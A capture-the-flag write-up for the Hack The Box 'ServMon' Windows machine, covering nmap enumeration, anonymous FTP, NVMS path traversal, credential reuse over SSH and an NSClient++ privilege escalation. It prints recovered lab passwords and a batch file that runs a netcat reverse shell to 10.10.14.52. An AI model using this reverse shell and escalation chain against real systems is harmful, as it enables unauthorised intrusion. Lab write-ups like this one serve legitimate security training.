ServMon HTB Writeup
Hello,
This time I am writing the solution for the ServMon box. A easy windows box. Let’s dive into the solution.
🔥 nmap to get the open ports.
nmap -sC -sV -oA initial -Pn 10.10.10.184The resutls…
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 12:05PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6699/tcp open tcpwrapped
8443/tcp open ssl/https-alt
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
|_ Location: /index.html
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=First of all the one port I will look is ftp because I have anonymous access allowed.
There is a directory named Users and inside that there are two directories Nadine and Nathan containing two files named Confidential.txt and Notes to do.txt respectively. It is a good thing at this time to keep notes about these two usernames.
The content of Confidential.txt:
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
NadineI keep in back of my mind that there is file named Passwords.txt in Nathan Desktop folder.
And Notes to do.txt:
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePointThere are some incompleted todo’s such as remove public access to NVMS. Remember port 80? Let’s take a look into that.
So this validates the 4th todo. I try to login by using admin as username and password but nothing. At this point because I don’t have a password, I try to search about vulnerabilites.
I open burp, navigate to 10.10.10.184 intercept the request and then send it to repeater(ctrl+r).
And indeed this works. Now If you remember from Confidential.txt there is a file with passwords. I get that file.
After trying each of this password with ssh password L1k3B1gBut7s@W0rk worked.
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
nadine@SERVMON C:\Users\Nadine> We can get user flag now.
After searching the box for hints about root, I find nothing. Going back to nmap we can see a port open 84433 wiht ssl cert. Visiting the site brings up a NSClient++.
Searching with searchsploit turns out there is a privilege escalation.
First we need to get the password of the client from file c:\program files\nsclient++\nsclient.ini
; Undocumented key
password = ew2x6SsGTxjRwXOT But the password does not work. Giving us a 403.
Going back to the nsclient.ini file I see there is present a configuration which does not allow connections from
; Undocumented key
allowed hosts = 127.0.0.1
````
Because I am using ssh I can create a local tunnel from my host to nsclient locally and then access it. By doing this I use a [trick](https://www.sans.org/blog/using-the-ssh-konami-code-ssh-control-sequences/) to access something like a hidden menu on ssh, and then execute
`-L 8443:127.0.0.1:8443`. And then go to my browser and access the website with `https://localhost:8443`
I now create a .bat script@echo off
C:\Temp\nc.exe 10.10.14.52 9854 -e powershell
and upload it alongside nc.exe inside `C:\Temp\` and setup listener on our local box
Next step is to enable two modules:
- CheckExternalScripts
- Scheduler
After I create a externalscript, with these key and value.(replace fuxsocy.bat with your .bat filename)
Next I setup to run it every minute.
and specify the command, which in our case is rce, which is the name of the external script which will execute the command.
Then I save the Changes under the `Changes` button and Under `Control` button I reset the service. I wait for 1-2 minutes and get a shell as administrator.
